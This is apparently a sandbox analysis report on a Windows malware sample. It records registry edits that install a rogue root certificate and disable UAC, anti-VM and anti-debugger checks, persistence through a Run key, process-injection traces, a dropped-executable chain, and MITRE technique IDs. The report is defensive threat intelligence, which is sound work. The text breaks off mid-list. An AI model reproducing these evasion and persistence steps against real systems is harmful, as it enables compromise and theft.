Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time"	windefender.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2412 = "Marquesas Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time"	windefender.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

Processes:

propro.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	propro.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	propro.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exeexplorha.exechrome.exe83495a94e8.exeexplorha.exerundll32.exepowershell.exeexplorha.exeamert.exeexplorha.exechrosha.exeRegAsm.exerundll32.exeQg_Appv5.exejok.exeTraffic.exeRegAsm.exe

pid	process
2520	b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe
2520	b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe
716	explorha.exe
716	explorha.exe
1636	chrome.exe
1636	chrome.exe
60	83495a94e8.exe
60	83495a94e8.exe
3412	explorha.exe
3412	explorha.exe
5084	rundll32.exe
5084	rundll32.exe
5084	rundll32.exe
5084	rundll32.exe
5084	rundll32.exe
5084	rundll32.exe
5084	rundll32.exe
5084	rundll32.exe
5084	rundll32.exe
5084	rundll32.exe
2860	powershell.exe
2860	powershell.exe
2856	explorha.exe
2856	explorha.exe
2860	powershell.exe
5288	amert.exe
5288	amert.exe
2860	powershell.exe
1636	chrome.exe
1636	chrome.exe
5580	explorha.exe
5580	explorha.exe
2212	chrosha.exe
2212	chrosha.exe
2028	RegAsm.exe
2028	RegAsm.exe
2304	rundll32.exe
2304	rundll32.exe
2304	rundll32.exe
2304	rundll32.exe
2304	rundll32.exe
2304	rundll32.exe
2304	rundll32.exe
2304	rundll32.exe
2304	rundll32.exe
2304	rundll32.exe
1448	Qg_Appv5.exe
1448	Qg_Appv5.exe
1468	jok.exe
1468	jok.exe
1448	Qg_Appv5.exe
6136	Traffic.exe
6136	Traffic.exe
4432	RegAsm.exe
4432	RegAsm.exe
4432	RegAsm.exe
4432	RegAsm.exe
4432	RegAsm.exe
4432	RegAsm.exe
4432	RegAsm.exe
4432	RegAsm.exe
4432	RegAsm.exe
4432	RegAsm.exe
4432	RegAsm.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

ptInst.execmd.exe

pid process

4928 ptInst.exe
2056 cmd.exe
2056 cmd.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

chrome.exe

pid process

1636 chrome.exe
1636 chrome.exe
1636 chrome.exe
1636 chrome.exe

pid	process
4928	ptInst.exe
2056	cmd.exe
2056	cmd.exe

pid	process
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe
Token: SeCreatePagefilePrivilege	1636	chrome.exe
Token: SeShutdownPrivilege	1636	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

1854307fae.exechrome.exeu4n4.1.exe

pid	process
1976	1854307fae.exe
1976	1854307fae.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1976	1854307fae.exe
1976	1854307fae.exe
1636	chrome.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
3872	u4n4.1.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

1854307fae.exechrome.exeu4n4.1.exe

pid	process
1976	1854307fae.exe
1976	1854307fae.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
1976	1854307fae.exe
3872	u4n4.1.exe
3872	u4n4.1.exe
3872	u4n4.1.exe
3872	u4n4.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exeexplorha.exe1854307fae.exechrome.exe

description	pid	process	target process
PID 2520 wrote to memory of 716	2520	b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe	explorha.exe
PID 2520 wrote to memory of 716	2520	b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe	explorha.exe
PID 2520 wrote to memory of 716	2520	b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe	explorha.exe
PID 716 wrote to memory of 1976	716	explorha.exe	1854307fae.exe
PID 716 wrote to memory of 1976	716	explorha.exe	1854307fae.exe
PID 716 wrote to memory of 1976	716	explorha.exe	1854307fae.exe
PID 1976 wrote to memory of 1636	1976	1854307fae.exe	chrome.exe
PID 1976 wrote to memory of 1636	1976	1854307fae.exe	chrome.exe
PID 1636 wrote to memory of 2260	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2260	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2164	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 3068	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 3068	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 4168	1636	chrome.exe	chrome.exe

System policy modification 1 TTPs 1 IoCs
evasion

Modify Registry
T1112

Processes:

Uni400uni.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Uni400uni.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Uni400uni.exe

C:\Users\Admin\AppData\Local\Temp\b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe
"C:\Users\Admin\AppData\Local\Temp\b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2520

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:716

C:\Users\Admin\AppData\Local\Temp\1000055001\1854307fae.exe
"C:\Users\Admin\AppData\Local\Temp\1000055001\1854307fae.exe"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
4⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fff12d89758,0x7fff12d89768,0x7fff12d89778
5⤵
PID:2260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1360 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:2
5⤵
PID:2164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:8
5⤵
PID:3068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2084 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:8
5⤵
PID:4168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:1
5⤵
PID:1000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:1
5⤵
PID:3808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4404 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:1
5⤵
PID:4676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3276 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:1
5⤵
PID:2364

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4636 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:8
5⤵
PID:4688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4648 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:8
5⤵
PID:2536

C:\Program Files\Google\Chrome\Application\chrome.exe
